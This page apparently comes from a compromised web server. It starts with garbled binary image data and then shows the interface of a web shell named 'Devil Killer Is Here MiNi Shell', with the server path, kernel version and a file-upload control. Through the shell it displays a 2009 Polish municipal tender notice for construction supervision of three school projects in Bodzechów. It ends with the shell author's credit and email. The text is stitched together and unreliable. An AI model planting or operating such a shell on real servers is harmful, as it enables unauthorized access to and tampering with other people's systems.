JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/160546-N-2009.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Pełnienie nadzoru inwestorskiego w branży budowlanej nad realizacją inwestycji pn.   Zadanie  1. Rozbudowa budynku Gimnazjum w Bodzechowie 
Zadanie 2. Remont oraz rozbudowa budynku Zespołu Szkół Publicznych w Sarnówku Dużym
Zadanie  3. Rozbudowa i przebudowa budynku Szkoły Podstawowej w Szewnie</b><br>
<b>Numer ogłoszenia: 160546 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bodzechów , ul. Mikołaja Reja 10, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 041 2653838, faks 041 2651038.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugb.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego w branży budowlanej nad realizacją inwestycji pn.   Zadanie  1. Rozbudowa budynku Gimnazjum w Bodzechowie 
Zadanie 2. Remont oraz rozbudowa budynku Zespołu Szkół Publicznych w Sarnówku Dużym
Zadanie  3. Rozbudowa i przebudowa budynku Szkoły Podstawowej w Szewnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje budowlany nadzór inwestorski procesu inwestycyjnego oraz wszystkie czynności wynikające z Ustawy z dnia 07 lipca 1994 r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156 poz. 1118 z późn. zm.), rozporządzenia Ministra Infrastruktury z dnia 26 czerwca 2002 r. w sprawie dziennika budowy, montażu i rozbiórki, tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz.U.   Nr 108 poz. 953 z późn, zm.) i niezbędne ze względu na zasady sztuki budowlanej  i gospodarności.
Do podstawowych obowiązków inspektora nadzoru inwestorskiego będzie należeć między innymi:
1)	zapoznanie się z dokumentacją budowlaną powierzonych zadań inwestycyjnych, w tym warunkami pozwolenia na budowę oraz warunkami terenowymi,
2)	czynny udział w weryfikacji harmonogramu rzeczowo - finansowego zadań i jego ewentualnych aktualizacji,
3)	zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami,
4)	Inspektor Nadzoru będzie nadzorował budowę (w trakcie jej realizacji) w takich odstępach czasu aby była zapewniona skuteczność nadzoru (za wyjątkiem przestoju w robotach, gdzie częstotliwość pobytu można ograniczyć do niezbędnego minimum) oraz na wezwanie Kierownika Budowy lub Inwestora. 
5)	sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Inwestora i przyszłych użytkowników, w tym:
a)	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji                  z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy
b)	sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosowanych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
c)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania
d)	sprawdzenie i odbiór robót, wynikających z harmonogramu robót budowlanych
e)	kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowości ich wykonania
f)	kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilości, jakości, wartości robót) w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu
g)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy (w tym weryfikacja kosztów ewentualnych zmian zakresu zadania i rodzaju materiałów w stosunku do przyjętej dokumentacji)
h)	rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Inwestora wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego
i)	branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania
j)	sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów. Dokonywanie oceny ich jakości na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, inspektor nadzoru ma obowiązek żądania od wykonawcy odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie.
k)	czuwanie nad przestrzeganiem zakazu wbudowania materiałów i wyrobów nie dopuszczonych do stosowania w budownictwie lub niewiadomego pochodzenia. W przypadku stwierdzenia niezgodności wykonywania robót budowlanych z dokumentacją techniczną (w tym specyfikacją techniczną wykonania i odbioru robót), nieprawidłowości procesów technologicznych, użycia niewłaściwych materiałów, wad w wykonywaniu lub prowadzeniu robót w sposób powodujący i mogący narazić Inwestora na straty - inspektor nadzoru zwraca na to uwagę kierownikowi budowy, zgłasza Inwestorowi oraz podejmuje odpowiednie decyzje.
l)	Inspektor Nadzoru ma prawo żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę
m)	sprawdzanie kompletności przedstawionych przez wykonawcę dokumentów i zaświadczeń wymaganych przez Inwestora i niezbędnych do przeprowadzenia odbioru
n)	sprawdzanie poprawności rozliczeń finansowych
o)	gromadzenie i przygotowanie materiałów analitycznych niezbędnych do rozliczenia wykonywanych robót i oceny osiągniętych efektów rzeczowych i finansowych
p)	branie udziału w komisjach powołanych do stwierdzenia ujawnionych wad w okresie trwania gwarancji i rękojmi (w tym udział w odbiorach pogwarancyjnych)
q)	kontrola usunięcia przez wykonawcę stwierdzonych wad
r)	uczestniczenie w przejęciu przez Inwestora od wykonawcy usuniętych wad - potwierdzonych protokołem
s)	koordynacja wszystkich wykonywanych robót branżowych
t)	dostarczanie do Referatu Techniczno-Inwestycyjnego (w wersji pisemnej) raz na dwa tygodnie raportów z postępu robót, opatrzonych zdjęciami, ze szczególnym uwzględnieniem robót zanikowych.

Zakres rzeczowy robót obejmuje :
 Parametry charakterystyczne dot. inwestycji pn. 
Zadanie  1.  Rozbudowa budynku Gimnazjum w Bodzechowie: dobudowa dwóch części: jedną część stanowi sala gimnastyczna, drugą - część szkolna, w skład której wchodzą sale lekcyjne, sanitariaty, szatnie, pomieszczenia techniczne oraz przestrzenie komunikacyjne. Część szkolna stanowi równocześnie łącznik pomiędzy istniejącym budynkiem, a salą gimnastyczną. Obie części obiektu są oddylatowane, zarówno od siebie jak i od części istniejącej 
Obiekt jest przystosowany dla potrzeb osób niepełnosprawnych - kondygnacja parteru. 
Charakterystyczne dane techniczne: 
 branża - architektura, konstrukcja, instalacje: elektryczne, odgromowe, CO, instalacje wodno - kanalizacyjne, instalacja wentylacji mechanicznej  
 rodzaj obiektu - szkoła z salą gimnastyczną, 
technologia wykonawstwa - fundamenty żelbetowe, ściany fundamentowe betonowe monolityczne lub murowane, ściany nadziemne murowane z pustaków ceramicznych, stalowa konstrukcja dachu, ściany działowe z betonu komórkowego lub cegły 
 poziom posadowienia +- 0,00 = 168,90 m.n.p.m. 
 kubatura projektowanych części: 
- 10540,00m3 
 powierzchnia zabudowy ( j.w.) 
- 1166,63m2 
 powierzchnia całkowita( j.w.) 
- 2219,54m2 
 powierzchnia użytkowa (j.w.) 
- 1361,21m2 
ilość kondygnacji budynku szkoły: parter, I piętro, sali gimnastycznej: parter - wysokość dwóch kondygnacji 
   podstawowe wymiary: 
sala gimnastyczna: 
- długość: 3350,0cm 
- szerokość: 1790,0cm / 2170,0cm 
- wysokość: 1090,0cm 
budynek szkoły
- długość: 2975,0cm 
- szerokość: 1250,0cm / 1910,0cm 
- wysokość: 900,0cm / 490,0cm 

Zadanie  2. Remont oraz rozbudowa budynku Zespołu Szkół Publicznych w Sarnówku Dużym: przedmiotem inwestycji jest zagospodarowanie terenu nieruchomości zlokalizowanej w Sarnówku- działka Nr 360 i 361, zabudowanej obecnie budynkiem szkoły podstawowej oraz gminnym ośrodkiem zdrowia wraz z infrastrukturą techniczną - kanalizacją sanitarną, wodociągiem, energią elektryczną i telekomunikacją. Inwestycja obejmuje budowę budynku przedszkola, połączonego łącznikiem z szkołą podstawową oraz zagospodarowanie terenu w bezpośrednim sąsiedztwie projektowanego obiektu. W ramach zagospodarowania terenu projektowane są nie kubaturowe urządzenia placu zabaw dla dzieci - huśtawki karuzele, piaskownica i inne oraz układ komunikacyjny - dojazd od drogi powiatowej z wykorzystaniem istniejącego zjazdu i bramy w ogrodzeniu szkoły i parkingi na terenie działki. Inwestycja częściowo wymaga zmiany i dostosowania przebiegu sieci zewnętrznego uzbrojenia terenu do potrzeb budowanego obiektu. Konieczne jest przełożenie fragmentów kanalizacji sanitarnej oraz szczelnego zbiornika na nieczystości . 
Charakterystyczne dane techniczne: 
  branża - architektura, konstrukcja, instalacje: elektryczne, CO, instalacje wodno - kanalizacyjne, instalacja wentylacji mechanicznej 
 rodzaj obiektu - szkoła podstawowa, 
 technologia wykonawstwa obiektu istniejącego - fundamenty ławy żelbetowe, ściany fundamentowe betonowe monolityczne lub murowane, ściany nadziemne murowane z cegły, pustaków ceramicznych lub bloczków gazobetonowych, stalowa konstrukcja dachu sali gimnastycznej ( pomieszczenie nie objęte projektem), ściany działowe z betonu komórkowego lub cegły
 kubatura istniejącego budynku objętego opracowaniem: 
- 7704,20m3 (w tym: szkoła 5882,60m2, sala gimnastyczna z zapleczem: 1821,60m2) 
  powierzchnia zabudowy ( j.w.) - 895,30m2 (w tym: szkoła 547,40m2, sala gimnastyczna z   
          zapleczem: 347,90m2) 
  powierzchnia całkowita( j.w.) 
- 1990,10m2 (w tym: szkoła 1642,20m2, sala gimnastyczna z zapleczem: 347,90m2) 
  powierzchnia użytkowa (j.w.) 
- 1571,50m2 
  poziom posadowienia +/- 0,00 = 202,15 m.n.p.m. 
  ilość kondygnacji budynków istniejących: 
- parter -sala gimnastyczna z zapleczem szatniowo sanitarnym 
- piwnica, parter, I piętro - główny budynek szkoły 
  podstawowe wymiary istniejącego budynku: 
          główny budynek szkoły: 
- długość: 4384,0cm 
- szerokość:1293,0cm 
- wysokość: 950,0cm ( od poziomu terenu przy głównym wejściu do kalenicy dachu) 
sala gimnastyczna: 
- długość: 1983,0cm 
- szerokość: 1612,0cm 
- wysokość: 785,0cm / 450,0cm 

Zadanie  3. Rozbudowa i przebudowa budynku Szkoły Podstawowej w Szewnie: przedmiotem inwestycji jest zagospodarowanie terenu nieruchomości zlokalizowanej w Szewnej - działka Nr 61/5, zabudowanej obecnie zespołem budynków szkoły podstawowej, gimnazjum i salą gimnastyczną, dla budowy przy sali gimnastycznej szkoły podstawowej budynków z dodatkowymi salami lekcyjnymi, biblioteki z czytelnią ( segment B i C) oraz adaptacji fragmentu parteru szkoły podstawowej na potrzeby przedszkola (z dobudowanym ryzalitem od strony wschodniej) i zaplecza kuchennego ze stołówką wraz z dobudową na wewnętrznym dziedzińcu pomiędzy szkołą podstawową i gimnazjum (segment A). Inwestycja częściowo wymaga zmiany i dostosowania przebiegu sieci zewnętrznego uzbrojenia terenu do potrzeb budowanego obiektu. Projekt zawiera elementy obsługi komunikacyjnej - dojścia i dojazdy oraz plac manewrowy dla straży pożarnej, pełniący jednocześnie funkcję boisk szkolnych. Obiekt jest przystosowany dla potrzeb osób niepełnosprawnych - kondygnacja parteru.
Charakterystyczne dane techniczne:
branża - architektura, konstrukcja, instalacje: elektryczne, odgromowe, CO, instalacje
wodno - kanalizacyjne, instalacja wentylacji mechanicznej 
rodzaj obiektu - szkoła - adaptacja fragmentu na przedszkole, dobudowa stołówki i
zaplecza kuchennego, sal lekcyjnych , biblioteki wraz czytelnią
 technologia wykonawstwa - fundamenty żelbetowe, ściany fundamentowe betonowe
monolityczne, ściany nadziemne murowane z pustaków ceramicznych lub bloczków
gazobetonowych, strop żelbetowy gęstożebrowy - segment C, stalowa konstrukcja
dachu części projektowanych, ściany działowe z betonu komórkowego lub cegły
kubatura istniejącego budynku objętego opracowaniem:
- 5993,60m3 powierzchnia zabudowy istniejącego budynku ( j.w.)
- 802,15m2
powierzchnia całkowita istniejącego budynku ( j.w.)
- 1402,45m2
powierzchnia użytkowa istniejącego budynku (j.w.)
- 1251,82m2
poziom posadowienia +- 0,00 = 191,85 m.n.p.m.
ilość kondygnacji budynków istniejących:
- parter -sala gimnastyczna i łącznik
- parter, I piętro - główny budynek szkoły
podstawowe wymiary istniejącego budynku:
główny budynek szkoły:
- długość: 3731,0cm
- szerokość:1885,0cm
- wysokość: 896,0cm
sala gimnastyczna i łącznik:
- długość: 2463,0cm
- szerokość: 878,0cm
- wysokość: 619,0cm
kubatura projektowanych części: Segment A (tylko dobudowa) + B (tylko dobudowa)
+ C
- 4499,44m3
powierzchnia zabudowy projektowanych części: Segment A (tylko dobudowa) + B
(tylko dobudowa) + C
- 648,47m2
 powierzchnia całkowita projektowanych części: Segment A (tylko dobudowa) + B
(tylko dobudowa) + C
- 1288,92 m2
powierzchnia użytkowa: Segment A + B + C
- 2224,57m2
poziom posadowienia +- 0,00 = 191,85 m.n.p.m.
ilość kondygnacji budynków projektowanych:
- parter - segment A - zaplecze kuchenne, stołówka, przedszkole,
- parter, I piętro - segment B - sale lekcyjne, komunikacja pomiędzy segmentem A
i C
- parter, I piętro, II piętro - segment C - biblioteka z czytelnią, sale lekcyjne
 podstawowe wymiary projektowanych części:
jadalnia i zaplecze kuchenne:
- długość: 2746,0cm
- szerokość: 834,0cm ( 240,0cm)
- wysokość: 435,0cm
przedszkole:
- długość: 1315,0cm
- szerokość: 578,0cm
- wysokość: 428,0cm
sale lekcyjne przy północno zachodniej elewacji sali gimnastycznej:
- długość: 1890,0cm
- szerokość: 820,0cm
- wysokość: 806,0cm
sale lekcyjne, biblioteka z czytelnią dobudowane przy północno wschodniej elewacji sali
gimnastycznej:
- długość: 2325,0cm
- szerokość: 1100,0cm
- wysokość: 1170,0cm.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy nie wykluczeni z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy oraz spełniający warunki zawarte w art. 22 ust.1 ustawy, którzy złożą formularz ofertowy  wraz z  załącznikami
Spełnienie opisanych warunków oceniane będzie przez Zamawiającego wg formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu ( załącznik Nr 3 ) oraz załączonych dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu , tj. warunków zawartych w art.22 ust.1 ustawy ( załącznik Nr 3 )
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Wykaz obejmujący co najmniej jedną usługę wykonaną w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie. Za usługę odpowiadającą swoim zakresem i złożonością Zamawiający rozumie nadzór budowlany nad budową, przebudową, rozbudową, nadbudową, modernizacją obiektu użyteczności publicznej  o  kubaturze nie mniejszej niż 5.000 m3 i o wartości nie mniejszej niż 3 000 000 zł.
6. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj.: uprawnienia do kierowania i nadzorowania robotami budowlanymi w specjalnościach:
konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci: wodociągowych i kanalizacyjnych, gazowych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych. 
oraz aktualne zaświadczenie potwierdzające wpis na listę członków właściwej izby samorządu zawodowego z określonym w nim terminem ważności,
7. Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bodzechow.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bodzechów, ul. Reja 10 Ostrowiec Św..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Urząd Gminy Bodzechów, ul. Reja 10 Ostrowiec Św., pokój nr 12 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com